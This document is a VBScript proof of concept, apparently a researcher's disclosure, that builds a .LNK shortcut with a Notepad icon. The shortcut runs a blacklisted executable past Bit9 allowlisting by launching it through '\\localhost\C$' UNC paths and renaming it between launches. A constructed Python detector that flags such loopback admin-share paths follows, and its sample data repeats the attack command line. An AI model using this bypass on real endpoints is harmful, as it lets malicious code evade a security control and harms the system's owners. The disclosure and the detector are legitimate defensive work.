' Reported a bug in the Bit9 whitelisting solution, where

' a blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other UNC-equivalent path.

' The attack vector could be a .LNK or .PS1 file. I prefer .LNK since it is rarely blacklisted.

' The VBS script below generates a POC .LNK file that exploits this.

' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.

' https://twitter.com/waleedassar

Set WshShell = WScript.CreateObject("WScript.Shell")

Set oShellLink = WshShell.CreateShortcut("B.Lnk")

' The shortcut launches cmd.exe; the interesting part is in the arguments below.
oShellLink.TargetPath = "Cmd.exe"

' Each "start" references the local file through the loopback admin share; each "rename" gives the same file a new name before the next launch.
oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"

oShellLink.WindowStyle = 1

oShellLink.IconLocation = "notepad.exe, 0"

oShellLink.Description = "Bit9 Bypass"
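' The root cause described above is that the allowlisting agent compares the literal path string instead of the
' resolved local file, so "\\localhost\C$\test\test.exe" and "C:\test\test.exe" are treated as different objects.
' The Python below is an added defensive example, not part of this POC or of Bit9: it canonicalizes loopback
' admin-share UNC paths found in process command lines back to their local drive form and flags any that match a
' blocked local path. Host names, sample events and the blocked path are all constructed for the example.

```python
import re

# Names that always refer to the local machine (constructed list; extend with the host's own name via local_hostnames).
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1", "."}

# \\<host>\<drive>$\rest  -> administrative share of a fixed drive
ADMIN_SHARE_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<drive>[a-zA-Z])\$(?P<rest>\\.*)?$")

# Any UNC-looking token inside a command line (stops at whitespace, '&' and quotes).
UNC_TOKEN_RE = re.compile(r'\\\\[^\s&"]+')


def canonicalize(path, local_hostnames=()):
    """Map a UNC admin-share path that points at this host to its C:\\... form; other paths are returned unchanged."""
    m = ADMIN_SHARE_RE.match(path.strip().strip('"'))
    if not m:
        return path
    host = m.group("host").lower()
    if host in LOOPBACK_HOSTS or host in {h.lower() for h in local_hostnames}:
        return m.group("drive").upper() + ":" + (m.group("rest") or "\\")
    return path


def loopback_unc_paths(cmdline, local_hostnames=()):
    """Return (unc_token, local_path) pairs for every UNC token in cmdline that resolves to a local drive."""
    hits = []
    for tok in UNC_TOKEN_RE.findall(cmdline):
        local = canonicalize(tok, local_hostnames)
        if local != tok:
            hits.append((tok, local))
    return hits


def flag_events(events, blocked, local_hostnames=()):
    """Return (pid, unc_token, local_path) for each loopback admin-share reference whose local form is blocked."""
    blocked_lc = {b.lower() for b in blocked}
    findings = []
    for ev in events:
        for tok, local in loopback_unc_paths(ev["cmdline"], local_hostnames):
            if local.lower() in blocked_lc:
                findings.append((ev["pid"], tok, local))
    return findings


# Constructed process-creation records (not real telemetry); pid 101 mirrors the command line from the POC above.
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": "cmd.exe /C start \\\\localhost\\C$\\test\\test.exe & rename \\\\localhost\\C$\\test\\test.exe test_1.exe"},
    {"pid": 102, "cmdline": "cmd.exe /C start \\\\fileserver\\share\\installer.exe"},
    {"pid": 103, "cmdline": "cmd.exe /C start \\\\WKS01\\D$\\tools\\x.exe"},
]
BLOCKED = {"C:\\test\\test.exe"}

if __name__ == "__main__":
    for pid, tok, local in flag_events(SAMPLE_EVENTS, BLOCKED, local_hostnames=("WKS01",)):
        print(f"pid {pid}: {tok} resolves to blocked local path {local}")
```

' The same canonicalization belongs in the allowlisting decision itself: compare the resolved local file (or, better, its hash), never the path string the caller supplied.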